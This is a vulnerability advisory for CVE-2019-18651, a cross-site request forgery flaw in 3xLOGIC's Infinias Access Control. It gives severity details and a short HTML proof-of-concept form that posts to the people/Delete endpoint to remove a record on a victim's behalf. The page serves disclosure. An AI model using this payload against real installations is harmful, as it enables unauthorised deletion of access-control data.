Cross-site request forgery in Infinias Access Control - CVE-2019-18651

 

Cross-site request forgery in Infinias Access Control - CVE-2019-18651

Published: November 15, 2019


Vulnerability identifier: #VU22786
CSH Severity: Low
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/U:Clear
CVE-ID: CVE-2019-18651
CWE-ID: CWE-352
Exploitation vector: Remote access
Exploit availability: No public exploit available
Vendor: 3xLOGIC Inc.
Affected software:
Infinias Access Control

Detailed vulnerability description

The vulnerability allows a remote attacker to perform cross-site request forgery attacks.

The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.

PoC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/IntelliM/people/Delete">
      <input type="hidden" name="id" value="Numeric_ID" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

How to mitigate CVE-2019-18651

Cybersecurity Help is currently unaware of any official solution to address this vulnerability.

Sources